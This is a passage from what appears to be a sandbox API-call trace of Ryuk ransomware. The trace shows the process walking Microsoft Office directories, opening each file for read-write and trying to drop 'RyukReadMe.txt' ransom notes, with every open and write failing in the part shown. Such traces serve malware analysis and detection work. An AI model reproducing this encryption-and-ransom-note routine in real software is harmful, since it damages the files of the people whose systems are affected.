hTemplateFile=0x0) returned 0xffffffffffffffff [0136.321] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.321] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.321] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.321] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.321] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME31.CSS", dwFileAttributes=0x80) returned 0 [0136.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME31.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme31.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.322] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.322] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.322] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.322] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.322] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME32.CSS", dwFileAttributes=0x80) returned 0 [0136.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME32.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme32.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.322] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.322] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.322] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.323] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.323] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME33.CSS", dwFileAttributes=0x80) returned 0 [0136.323] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME33.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme33.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.323] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.323] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.323] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.324] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.324] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME34.CSS", dwFileAttributes=0x80) returned 0 [0136.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME34.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme34.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.324] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.324] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.324] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.324] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.324] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME35.CSS", dwFileAttributes=0x80) returned 0 [0136.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME35.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme35.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.325] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.325] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.325] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.325] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.325] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME36.CSS", dwFileAttributes=0x80) returned 0 [0136.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME36.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme36.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.325] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.326] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.326] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.326] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.326] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME37.CSS", dwFileAttributes=0x80) returned 0 [0136.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME37.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme37.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.326] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.326] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.326] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.326] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.326] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME38.CSS", dwFileAttributes=0x80) returned 0 [0136.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME38.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme38.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.327] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.327] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.327] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.327] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.327] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME39.CSS", dwFileAttributes=0x80) returned 0 [0136.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME39.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme39.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.328] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.328] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.328] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.328] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.328] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME40.CSS", dwFileAttributes=0x80) returned 0 [0136.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME40.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme40.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.328] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.328] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.328] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.328] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.329] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME41.CSS", dwFileAttributes=0x80) returned 0 [0136.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME41.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme41.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.329] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.329] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.329] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.329] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.329] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME42.CSS", dwFileAttributes=0x80) returned 0 [0136.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME42.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme42.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.329] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.329] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.329] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.329] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.330] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME43.CSS", dwFileAttributes=0x80) returned 0 [0136.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME43.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme43.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.330] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.330] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.331] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.331] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.331] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME44.CSS", dwFileAttributes=0x80) returned 0 [0136.331] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME44.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme44.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.331] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.331] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.331] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.331] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.331] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME45.CSS", dwFileAttributes=0x80) returned 0 [0136.331] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME45.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme45.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.331] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.332] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.332] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.332] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.332] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME46.CSS", dwFileAttributes=0x80) returned 0 [0136.332] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME46.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme46.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.332] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.332] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.332] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.332] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.332] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME47.CSS", dwFileAttributes=0x80) returned 0 [0136.333] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME47.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme47.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.333] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.333] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.333] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.333] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.334] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME48.CSS", dwFileAttributes=0x80) returned 0 [0136.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME48.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme48.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.334] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.334] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.334] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.334] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.334] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME49.CSS", dwFileAttributes=0x80) returned 0 [0136.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME49.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme49.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.334] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.334] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.335] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.335] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.335] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME50.CSS", dwFileAttributes=0x80) returned 0 [0136.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME50.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme50.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.335] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.335] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.335] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.335] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.335] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME51.CSS", dwFileAttributes=0x80) returned 0 [0136.336] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME51.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme51.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.336] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.336] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.336] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.336] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.336] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME52.CSS", dwFileAttributes=0x80) returned 0 [0136.336] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME52.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme52.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.337] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.337] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.337] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.337] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.337] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME53.CSS", dwFileAttributes=0x80) returned 0 [0136.337] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME53.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme53.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.337] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.337] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.337] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.337] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.338] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME54.CSS", dwFileAttributes=0x80) returned 0 [0136.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME54.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme54.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.338] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.338] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.338] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.338] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.338] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME55.CSS", dwFileAttributes=0x80) returned 0 [0136.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME55.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme55.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.338] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.338] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.339] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0136.339] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0136.339] SetLastError (dwErrCode=0x0) [0136.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.342] GetLastError () returned 0x5 [0136.342] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.342] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.342] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.342] SetLastError (dwErrCode=0x0) [0136.342] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.342] GetLastError () returned 0x5 [0136.342] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.342] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.342] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0136.347] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.348] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.348] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.348] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.348] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR10F.GIF", dwFileAttributes=0x80) returned 0 [0136.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR10F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir10f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.349] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.349] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.349] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.349] VirtualAlloc 